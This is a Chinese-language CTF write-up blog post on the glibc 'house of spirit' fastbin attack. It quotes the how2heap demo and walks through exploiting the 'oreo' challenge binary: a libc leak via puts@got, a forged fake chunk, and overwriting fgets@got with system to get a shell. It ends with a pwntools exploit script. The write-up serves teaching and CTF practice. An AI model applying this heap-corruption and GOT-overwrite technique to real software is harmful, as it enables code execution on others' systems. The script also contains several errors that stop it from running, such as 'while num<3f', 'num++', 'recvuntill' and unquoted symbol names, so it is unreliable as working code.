<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>House_of_spirit | Bin Fantasy🤯</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="​        Fastbin Attack 中的 house_of_spirit。 (精神家园？？)">
<meta property="og:type" content="article">
<meta property="og:title" content="House_of_spirit">
<meta property="og:url" content="http://example.com/2020/03/06/house-of-spirit/index.html">
<meta property="og:site_name" content="Bin Fantasy🤯">
<meta property="og:description" content="​        Fastbin Attack 中的 house_of_spirit。 (精神家园？？)">
<meta property="og:locale">
<meta property="og:image" content="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/3.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/4.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/5.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/6.png">
<meta property="og:image" content="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/7.jpg">
<meta property="og:image" content="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/8.png">
<meta property="article:published_time" content="2020-03-06T10:43:46.000Z">
<meta property="article:modified_time" content="2020-03-06T14:13:42.655Z">
<meta property="article:author" content="Ash3n On3">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/1.png">
  
    <link rel="alternate" href="/atom.xml" title="Bin Fantasy🤯" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

  
<link rel="stylesheet" href="/plugin/bganimation/bg.css">

  

  <link href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.10.0/katex.min.css" rel="stylesheet" type="text/css">
<meta name="generator" content="Hexo 5.4.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <div class="outer">
        <div class="widget-wrap mobile-header">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/avatar/avatar%20(3).jpg">
    <h2 class="author">Ash3n On3</h2>
    <h3 class="description"></h3>
    <div class="count-box">
      <a href="/archives"><div><strong>14</strong><br>文章</div></a>
      <a href="/categories"><div><strong>0</strong><br>分类</div></a>
      <a href="/tags"><div><strong>0</strong><br>标签</div></a>
    </div>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>主页</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>归档</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分类</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>标签</li>
          </a>
        
    </ul>
  </div>
</div>

        <section id="main"><article id="post-house-of-spirit" class="wow slideInRight article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/03/06/house-of-spirit/" class="article-date">
  <time class="post-time" datetime="2020-03-06T10:43:46.000Z" itemprop="datePublished">
    <span class="post-month">3月</span><br/>
    <span class="post-day">06</span>
  </time>
</a>
   
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      House_of_spirit
    </h1>
  

        <div>
          
          
              

          
        </div>
      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>​        Fastbin Attack 中的 house_of_spirit。 (精神家园？？)<span id="more"></span></p>
<h2 id="0x00-house-of-spirit"><a href="#0x00-house-of-spirit" class="headerlink" title="0x00 . house_of_spirit"></a>0x00 . house_of_spirit</h2><p>​        按照惯例。。。看看how2heap的代码：</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;This file demonstrates the house of spirit attack.\n&quot;</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Calling malloc() once so that it sets up its memory.\n&quot;</span>);</span><br><span class="line">	<span class="built_in">malloc</span>(<span class="number">1</span>);</span><br><span class="line">	</span><br><span class="line">	<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;We will now overwrite a pointer to point to a fake &#x27;fastbin&#x27; region.\n&quot;</span>);</span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="keyword">long</span> *a;</span><br><span class="line">	<span class="comment">// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)</span></span><br><span class="line">	<span class="keyword">unsigned</span> <span class="keyword">long</span> <span class="keyword">long</span> fake_chunks[<span class="number">10</span>] __attribute__ ((<span class="built_in">aligned</span> (<span class="number">16</span>)));</span><br><span class="line">	<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n&quot;</span>, <span class="built_in"><span class="keyword">sizeof</span></span>(fake_chunks), &amp;fake_chunks[<span class="number">1</span>], &amp;fake_chunks[<span class="number">9</span>]);</span><br><span class="line">	<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;This chunk.size of this region has to be 16 more than the region (to accommodate the chunk data) while still falling into the fastbin category (&lt;= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n&quot;</span>);</span><br><span class="line">	<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n&quot;</span>);</span><br><span class="line">	fake_chunks[<span class="number">1</span>] = <span class="number">0x40</span>; <span class="comment">// this is the size</span></span><br><span class="line">	<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;The chunk.size of the *next* fake region has to be sane. That is &gt; 2*SIZE_SZ (&gt; 16 on x64) &amp;&amp; &lt; av-&gt;system_mem (&lt; 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n&quot;</span>);</span><br><span class="line">        <span class="comment">// fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8</span></span><br><span class="line">	fake_chunks[<span class="number">9</span>] = <span class="number">0x1234</span>; <span class="comment">// nextsize</span></span><br><span class="line">	<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n&quot;</span>, &amp;fake_chunks[<span class="number">1</span>]);</span><br><span class="line">	<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n&quot;</span>);</span><br><span class="line">	a = &amp;fake_chunks[<span class="number">2</span>];</span><br><span class="line">	<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Freeing the overwritten pointer.\n&quot;</span>);</span><br><span class="line">	<span class="built_in">free</span>(a);</span><br><span class="line">	<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n&quot;</span>, &amp;fake_chunks[<span class="number">1</span>], &amp;fake_chunks[<span class="number">2</span>]);</span><br><span class="line">	<span class="built_in">fprintf</span>(stderr, <span class="string">&quot;malloc(0x30): %p\n&quot;</span>, <span class="built_in">malloc</span>(<span class="number">0x30</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​        说实话，这个代码看得脑壳疼，没完全看懂。</p>
<p>​        大概的攻击思路就是，找一个可控的区域，比如栈，bss段，可读可写的，在此区域写一个fake fast chunk，然后想办法free掉，这么一来就掉进了fastbin里面。因为fake fast chunk在链表头(main_arena指向)，所以malloc后fake chunk会直接分配出来，然后就可以任意读写随意浪了。</p>
<h2 id="0x01-oreo-🍪"><a href="#0x01-oreo-🍪" class="headerlink" title="0x01 . oreo  🍪"></a>0x01 . oreo  🍪</h2><h3 id="A-ELF-Analysis"><a href="#A-ELF-Analysis" class="headerlink" title="A . ELF Analysis"></a>A . ELF Analysis</h3><p>​        明明是个买枪的程序。。。为啥叫奥利奥</p>
<img src="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/1.png" style="zoom:80%;" />

<p>​        花里胡哨的最喜欢了😬😬😬</p>
<img src="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/2.png" style="zoom:67%;" />

<p>​        主要函数如下</p>
<img src="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/3.png" style="zoom:80%;" />

<p>​        add函数里可以发现，程序添加chunk时，会形成这样的一种链表结构：</p>
<img src="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/4.jpg" style="zoom:20%;" />

<p>​        并且存在明显的溢出，所以可以估摸着覆盖掉next指针。</p>
<img src="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/5.png" style="zoom:80%;" />

<p>​        show()：展示所有订单的description和name。</p>
<p>​        order()：下单，并删除前面所有chunk。</p>
<p>​        leave()：在订单中备注，用到了message指针(bss段)，而message指针在程序开头就指向了message_ptr。</p>
<p>​        stats()：输出订单数和备注数以及最近一次备注内容，可以用作输出。</p>
<p>​        程序中用到的许多重要指针都能在bss段找到：</p>
<img src="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/6.png" style="zoom: 80%;" />

<h3 id="B-Main-ideas-💡"><a href="#B-Main-ideas-💡" class="headerlink" title="B . Main ideas  💡"></a>B . Main ideas  💡</h3><ul>
<li><p>堆溢出构造链表，Leak libc_base。</p>
</li>
<li><p>伪造fake chunk，并且绕过检测</p>
</li>
<li><p>Getshell</p>
</li>
</ul>
<h3 id="C-Step-by-Step"><a href="#C-Step-by-Step" class="headerlink" title="C . Step by Step"></a>C . Step by Step</h3><h4 id="1-Leak-libc-base"><a href="#1-Leak-libc-base" class="headerlink" title="1.Leak libc_base"></a>1.Leak libc_base</h4><ul>
<li>新建一个chunk，通过溢出使得其next指针指向puts@got</li>
<li>show()查看所有chunk的内容，得到puts_addr</li>
<li>通过计算得到libc_base，system@got。</li>
</ul>
<h4 id="2-Arrange-fake-chunk"><a href="#2-Arrange-fake-chunk" class="headerlink" title="2.Arrange fake chunk"></a>2.Arrange fake chunk</h4><ul>
<li><p>循环新建chunk，当count_in_add == 0x3f，退出循环。</p>
</li>
<li><p>此时再新建一个chunk构造fake chunk。此时count_in_add == 0x40，我们可以将其用作fake chunk size</p>
</li>
<li><p>fake chunk结构如下：</p>
<img src="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/7.jpg" style="zoom: 25%;" /></li>
<li><p>把fake chunk的next chunk的pre_size也给改了，就能绕过测试了。</p>
</li>
<li><p>万事俱备，用order()来free掉整个链表，然后main_arena就指向了最后的fake chunk。</p>
<h4 id="3-Getshell"><a href="#3-Getshell" class="headerlink" title="3.Getshell"></a>3.Getshell</h4></li>
<li><p>现在我们add()就能得到fake chunk，再在里面写入fgets@got，也就是写入到了fake chunk的fd位置。fgets@got在菜单循环的switch的参数函数中会用到。而红色箭头位置就是我们要写入“/bin/sh”的地儿。</p>
</li>
</ul>
<img src="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/house_of_spirit/8.png" style="zoom: 80%;" />

<ul>
<li>这时再用leave()函数，修改message。注意此时message与fake chunk的fd是同一地址，上面的fake chunk结构图比较清楚。将message中内容(fgets@got)改成system@got。</li>
<li>现在直接送入”/bin/sh\x00”就行啦。</li>
</ul>
<h3 id="D-Exploit"><a href="#D-Exploit" class="headerlink" title="D . Exploit"></a>D . Exploit</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">p = process(<span class="string">&#x27;./oreo&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./oreo&#x27;</span>)</span><br><span class="line">libc = ELF(<span class="string">&#x27;./libc.so.6&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">des,name</span>):</span></span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Action: &quot;</span>,<span class="built_in">str</span>(<span class="number">1</span>))</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Rifle name: &quot;</span>,name)</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Rifle description: &quot;</span>,des)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>():</span></span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Action: &quot;</span>,<span class="built_in">str</span>(<span class="number">2</span>))</span><br><span class="line">	p.recvuntil(<span class="string">&quot;===================================&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">order</span>():</span></span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Action: &quot;</span>,<span class="built_in">str</span>(<span class="number">3</span>))</span><br><span class="line">	p.recvuntill(<span class="string">&quot;Okay order submitted!&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">leave</span>(<span class="params">message</span>):</span></span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Action: &quot;</span>,<span class="built_in">str</span>(<span class="number">4</span>))</span><br><span class="line">	p.sendlineafter(<span class="string">&quot;your order:&quot;</span>,message)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">stats</span>():</span></span><br><span class="line">	p.sendlineafter(<span class="string">&quot;Action: &quot;</span>,<span class="built_in">str</span>(<span class="number">5</span>))</span><br><span class="line"></span><br><span class="line">puts_got = elf.gots[puts]</span><br><span class="line">free_got = elf.gots[free]</span><br><span class="line">puts_offset = libc.symbols[puts]</span><br><span class="line">system_offset = libc.symbols[system]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#========================Leak libc base============================</span></span><br><span class="line">payload = <span class="number">27</span> * <span class="string">&#x27;X&#x27;</span> + p32(puts_got)		<span class="comment">#so the next chunk we could recv puts_got</span></span><br><span class="line">add(<span class="string">&quot;Nothing&quot;</span>,payload)</span><br><span class="line">show()</span><br><span class="line">p.recvuntil(<span class="string">&quot;===================================&quot;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&quot;Description: &quot;</span>)</span><br><span class="line">puts_plt = u32(p.recvuntil(<span class="string">&#x27;\n&#x27;</span>, drop=<span class="literal">True</span>)[:<span class="number">4</span>])		<span class="comment">#got the ture addr of puts</span></span><br><span class="line">libc_base = puts_plt - puts_offset</span><br><span class="line">system_addr = libc_base + system_offset</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#========================Arrange fake chunk==========================</span></span><br><span class="line">num = <span class="number">1</span></span><br><span class="line"><span class="keyword">while</span> num&lt;3f :		<span class="comment">#System will break the circle while num (count_in_add) == 3f</span></span><br><span class="line">	add(<span class="built_in">str</span>(num),<span class="string">&quot;gun&quot;</span>+<span class="built_in">str</span>(num))</span><br><span class="line">	num++</span><br><span class="line">payload = <span class="number">27</span> * <span class="string">&#x27;X&#x27;</span> + p32(<span class="number">0x0804A2A8</span>)		<span class="comment">#But 0x0804A2A8(massage) is now saving the message_ptr</span></span><br><span class="line">add(<span class="string">&quot;Nothing&quot;</span>,payload)		<span class="comment">#count_in_add == 0x40,so it can be used as the size of fake_chunk</span></span><br><span class="line"></span><br><span class="line">payload = <span class="number">0x20</span> * <span class="string">&#x27;X&#x27;</span> + p32(<span class="number">0x40</span>)</span><br><span class="line">leave(payload)		<span class="comment">#now the fake_chunk is in the link_list and able to bypass the test</span></span><br><span class="line">order()		<span class="comment">#delete the linklist,so the fake_chunk is in the fastbin now</span></span><br><span class="line"><span class="comment">#============================Getshell=============================</span></span><br><span class="line">fgets_got = elf.got[fgets]</span><br><span class="line">add(fgets_got,<span class="string">&quot;Nothing&quot;</span>)		<span class="comment">#the fake_chunk was malloced since it is in the bin_top</span></span><br><span class="line">leave(system_addr)		<span class="comment">#fgets_got was changed to system_addr</span></span><br><span class="line">p.sendline(<span class="string">&quot;/bin/sh\x00&quot;</span>)		<span class="comment">#fgets(&quot;/bin/sh&quot;) &lt;====&gt; system(&quot;/bin/sh&quot;)</span></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>


      
    </div>
    <footer class="article-footer">
      <a data-url="http://example.com/2020/03/06/house-of-spirit/" data-id="ckmliws2v000es8ljfxitbi8z" class="article-share-link">Share</a>
      
      
    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2020/03/16/Off_By_One/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          Off_By_One (plaiddb)
        
      </div>
    </a>
  
  
    <a href="/2020/03/03/SleepHolder/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">SleepHolder</div>
    </a>
  
</nav>

  
</article>



</section>
        
          <aside id="sidebar">
  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <h1 class="blog-title">Bin Fantasy🤯</h1>
    <h2 class="blog-subtitle">You may found nothing here.</h2>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>主页</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>归档</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分类</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>标签</li>
          </a>
        
    </ul>
  </div>
</div>

  
    <div class="widget-wrap">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="https://raw.githubusercontent.com/ash3n-on3/For-blog-photos/master/avatar/avatar%20(3).jpg">
    <h2 class="author">Ash3n On3</h2>
    <h3 class="description"></h3>
    <div class="count-box">
      <a href="/archives"><div><strong>14</strong><br>文章</div></a>
      <a href="/categories"><div><strong>0</strong><br>分类</div></a>
      <a href="/tags"><div><strong>0</strong><br>标签</div></a>
    </div>



    <div class="social-link">
      
        <a class="hvr-bounce-in" href="http://github.com/ShanaMaid" target="_blank" title="Github">
          Github
        </a>
      
    </div>

    <div class="friend-link">
      <h2>友链</h2>
      
        <a class="hvr-bounce-in" href="http://blog.shanamaid.top/" target="_blank" title="ShanaMaid">
          ShanaMaid
        </a>
      
    </div>
  </div>
</div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy;2020 - 2021 Ash3n On3<br>
      由<a href="http://hexo.io/" target="_blank">Hexo</a>强力驱动 | 
      主题-<a target="_blank" rel="noopener" href="https://github.com/ShanaMaid/hexo-theme-shana">Shana</a>
      
    </div>
    
  </div>
</footer>
    </div>
    

<script src="//apps.bdimg.com/libs/jquery/2.1.4/jquery.min.js"></script>
<script src="//apps.bdimg.com/libs/wow/0.1.6/wow.min.js"></script>
<script>
new WOW().init();
</script>   


  
<link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">

  
<script src="/plugin/fancybox/jquery.fancybox.pack.js"></script>




  <section class="hidden-xs"> 
  <ul class="cb-slideshow"> 
    <li><span>苟利</span></li> 
    <li><span>国家</span></li> 
    <li><span>生死以</span></li> 
    <li><span>岂能</span></li> 
    <li><span>祸福</span></li> 
    <li><span>趋避之</span></li> 
  </ul>
</section>

<script src="/js/script.js"></script>




  </div>
</body>
</html>